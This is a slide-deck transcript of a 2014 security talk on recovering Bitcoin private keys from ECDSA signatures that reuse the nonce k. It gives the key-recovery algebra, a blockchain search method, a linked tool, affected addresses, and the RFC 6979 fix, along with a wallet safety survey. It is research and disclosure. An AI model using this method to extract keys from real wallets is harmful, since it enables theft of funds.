Exploiting ECDSA Failures in the Bitcoin Blockchain

Exploiting ECDSA Failures in the Bitcoin Blockchain

9fdab9d005b82612cadbfe699b541f83?s=128

Filippo Valsorda

October 15, 2014
Tweet

Transcript

  1. Filippo Valsorda Exploiting ECDSA Failures in the Bitcoin Blockchain HITB2014KUL

  2. CloudFlare security team @FiloSottile I mess with cryptography. And open

    source. ! filippo.io Filippo Valsorda
  3. But you probably know me for this

  4. https://filippo.io/heartbleed

  5. Bitcoin

  6. Public key + Private key A wallet The address: hash

    ( public key ) 1DY5YvRxSwomrK7nELDZzAidQQ6ktjRR9A
  7. A signed statement, published to the world and recorded in

    the blockchain A transaction “This money I can spend, can now be spent by Y”
  8. A: This money I can spend, can now be spent

    by X …: This money I can spend, can now be spent by … …: This money I can spend, can now be spent by … …: This money I can spend, can now be spent by … X: This money I can spend, can now be spent by Y …: This money I can spend, can now be spent by … …: This money I can spend, can now be spent by … Y has this money to spend
  9. A: This money I can spend, can now be spent

    by X Signed with A’s private key Hash of X’s public key
  10. OP_DUP OP_HASH160 <pubKeyHash> OP_EQUALVERIFY OP_CHECKSIG <sig> <pubKey> Actually

  11. None
  12. ECDSA

  13. A EC based signature scheme As seen in TLS, DNSSEc,

    the PS3… Elliptic Curve Digital Signature Algorithm
  14. Global: point G on a curve Private key: a random

    number d Public key: d X G A summary
  15. e = hash(message) k = a random number (x, y)

    = k X G r = x Signature Sig: [r,(e+r*d)/k]
  16. Unless… Seems fine, right? What happens if that k is

    not random?
  17. k1 = k2 (x, y) = k X G r

    = x r1 = r2 If you reuse k Sig1: [r,(e1+r*d)/k] Sig2: [r,(e2+r*d)/k]
  18. If you reuse k Sig1: [ r ,(e1+r*d)/k] Sig2: [

    r ,(e2+r*d)/k] k1 = k2 (x, y) = k X G r = x r1 = r2
  19. If you reuse k Sig1: [r, (e1+r*d)/k ] Sig2: [r,

    (e2+r*d)/k ] k1 = k2 (x, y) = k X G r = x r1 = r2
  20. k = (e1 - e2)/ (e1+r*d)/k - (e2+r*d)/k] If you

    reuse k d = [(e1+r*d)/k]*k-e1 r
  21. Boom.

  22. Text Text Text Text Text Text Text Text Text Imperialviolet

    Accent Accent Accent
  23. Text Text Text Text Text Text Text Text Text Sony’s

    ECDSA code Mittwoch, 29. Dezember 2010
  24. None
  25. the blockchain

  26. To spend money: the public key of the address; a

    signature w/ that key Reminder when money is moved a signature is published
  27. for block in chain: for tx in block: for input

    in tx: ... An easy search A input is money being spent in the tx
  28. Extract r from the signature; take note of where we

    found it in a lookup table; check if we found it before. An easy search
  29. Done! If anyone reuses k, we will find two equal

    r.
  30. Well… No. I mean, yes, but there are 100M inputs

    in the blockchain. Done! Out of memory! :(
  31. First pass: filter the possible r. Add to a Bloom

    filter, if present add to a set. ! Second pass: if r present in the set, export sig and pubkey. A smarter search
  32. A smarter search r = 42 r = 42 Bloom

    filter + Blockchain Set
  33. A smarter search Bloom filter ? Blockchain 42 ✓ r

    = 42 r = 42 + Set
  34. A smarter search ? ✓ Final list Sig, Pubkey, Tx…

    r = 42 r = 42 42 Set 19 36 Blockchain
  35. Group the list by (r, pubkey) and recover d from

    pairs of signatures! Finally
  36. A ready to use tool Blockchainr github.com/filosottile/blockchainr

  37. Results

  38. https://filippo.io/hitb If you want to follow from home

  39. Does this happen?

  40. Yes. Does this happen?

  41. Vertical: address Color: r

  42. weird Multisignature transactions

  43. 1KtjBE8yDxoqNTSyLG2re4qtKK19KpvVLT 1BkE8ttBRUKVNTj3Lx1EPsw7vVbhuLZhBt

  44. Vertical: address Color: r

  45. “gomez” 1GozmcsMBC7bnMVUQLTKEw5vBxbSeG4erW / 1HKywxiL4JziqXrzLKhmB6a74ma6kxbSDj

  46. Repeated r in the same transaction

  47. https://bitcointalk.org/index.php?topic=271486 “Bad signatures leading to 55.82152538 BTC theft (so far)”

  48. https://bitcointalk.org/index.php?topic=277595 Blockchain.info security [FUNDS STOLEN]

  49. Text Text Text Text Text Text Text Text Text TEXT

    TEXT TEXT TEXT Accent Accent Accent
  50. Nick sullivan “exploiting randomness” demo

  51. None
  52. None
  53. The fix

  54. k must be secret and unique What’s needed Not necessarily

    random
  55. Generate k deterministically, as a function of private key and

    message. RFC 6979 k = HMAC_DRBG ( d, H (m) )
  56. Bitcoin core unsafe: openssl patch by AGL waiting on master

  57. None
  58. electrum safe since v1.9 correct use of python-ecdsa

  59. Multibit / bitcoinj safe correct use of bouncycastle

  60. Blockchain.info Unsafe relies on the browser RNG (if any!)

  61. None
  62. bitrated / bitcoinjs-lib Safe Hashes privkey, message and random

  63. Armory unsafe (? - 90%) crypto++ seems to use a

    random value
  64. Trezor Safe Implements RFC 6979

  65. Q&A @filosottile filippo.io/hitb-slides